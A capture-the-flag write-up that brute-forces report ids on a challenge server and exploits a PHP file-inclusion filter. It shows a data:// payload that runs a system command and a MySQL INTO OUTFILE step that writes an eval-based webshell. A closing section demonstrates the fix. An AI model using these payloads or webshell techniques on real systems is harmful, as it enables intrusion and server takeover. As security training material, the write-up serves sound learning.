ics-06: The hint says there is something in the report center, so go to the report center with ?id=1. Free points: just brute-force it. The community edition of Burp Suite that ships with Kali is, frankly, not up to the job, so write your own script to run it.
```python
import requests

# Base URL of the report page on the author's challenge instance; only the id changes.
url = 'http://111.200.241.244:54758/index.php?id='
r = requests.session()

# Baseline: the response length for id=1 (it was 1653 on the author's instance).
response = r.get(url + '1')
baseline = len(response.text)
print(baseline)

# Walk the ids upward; the first page whose length differs from the baseline is the odd one out.
for i in range(1, 10000):
    response1 = r.get(url + str(i))
    print(len(response1.text))
    if len(response1.text) != baseline:
        print(i)
        print(response1.text)
        break
```
WEB_php_include:
```php
<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
    $page=str_replace("php://", "", $page);
}
include($page);
?>
```
Source analysis: the input has to get past strstr and str_replace, and both functions are strictly case-sensitive, so only an exact lowercase `php://` is ever stripped.

1. `PHP://input` is a very dangerous pseudo-protocol (stream wrapper): it treats the content sent along with the request as code.
2. Bypass with the data pseudo-protocol: `?page=data://text/plain,<?php system("cat fl4gisisish3r3.php"); ?>`. The output has been altered on the rendered page; look in the page source.
3. Since we can execute system commands, and directory scanning turned up phpmyadmin, try logging into the database with weak credentials. It turned out to have no password at all, so try writing a shell through the database. `SHOW VARIABLES LIKE "secure_file_priv"` // this variable controls whether MySQL may read and write files; an empty value means it can. `SELECT "<?php eval(@$_POST['xiaohua']); ?>" INTO OUTFILE '/tmp/test1.php'`, then connect with China Chopper (菜刀).
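As an added illustration (not part of the original writeup), the following Python models the filter loop from the PHP source above and sets it beside the kind of check that actually closes the hole: a case-insensitive wrapper test plus an allowlist of page names. The entries in `ALLOWED_PAGES` are made-up values for the demonstration.

```python
import re

def php_filter(page: str) -> str:
    """Model of the writeup's PHP loop: strstr()/str_replace() are case-sensitive,
    so only an exact lowercase 'php://' is ever removed from the parameter."""
    while "php://" in page:
        page = page.replace("php://", "")
    return page

# Any scheme prefix, matched case-insensitively (php://, PHP://, data://, ...).
WRAPPER_RE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.IGNORECASE)

def has_stream_wrapper(page: str) -> bool:
    """True if the value starts with a stream-wrapper scheme, whatever its case."""
    return WRAPPER_RE.match(page) is not None

# Constructed allowlist for the hardened variant; a real app maps to its own templates.
ALLOWED_PAGES = {"home", "about", "contact"}

def hardened_resolve(page: str):
    """Allowlist resolution: the parameter selects a known file, anything else is refused.
    Returns the path to include, or None when the request must be rejected."""
    if page not in ALLOWED_PAGES:
        return None
    return f"pages/{page}.php"

if __name__ == "__main__":
    # The two inputs the writeup uses pass the original filter untouched;
    # the wrapper test and the allowlist both reject them.
    for p in ["home", "PHP://input", "data://text/plain,x", "php://php://input"]:
        print(f"{p!r:26} filter={php_filter(p)!r:20} "
              f"wrapper={has_stream_wrapper(p)!s:5} resolve={hardened_resolve(p)}")
```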
Reference video links: https://www.bilibili.com/video/BV1UM4y1N7gN/ https://www.bilibili.com/video/BV1A54y1772U/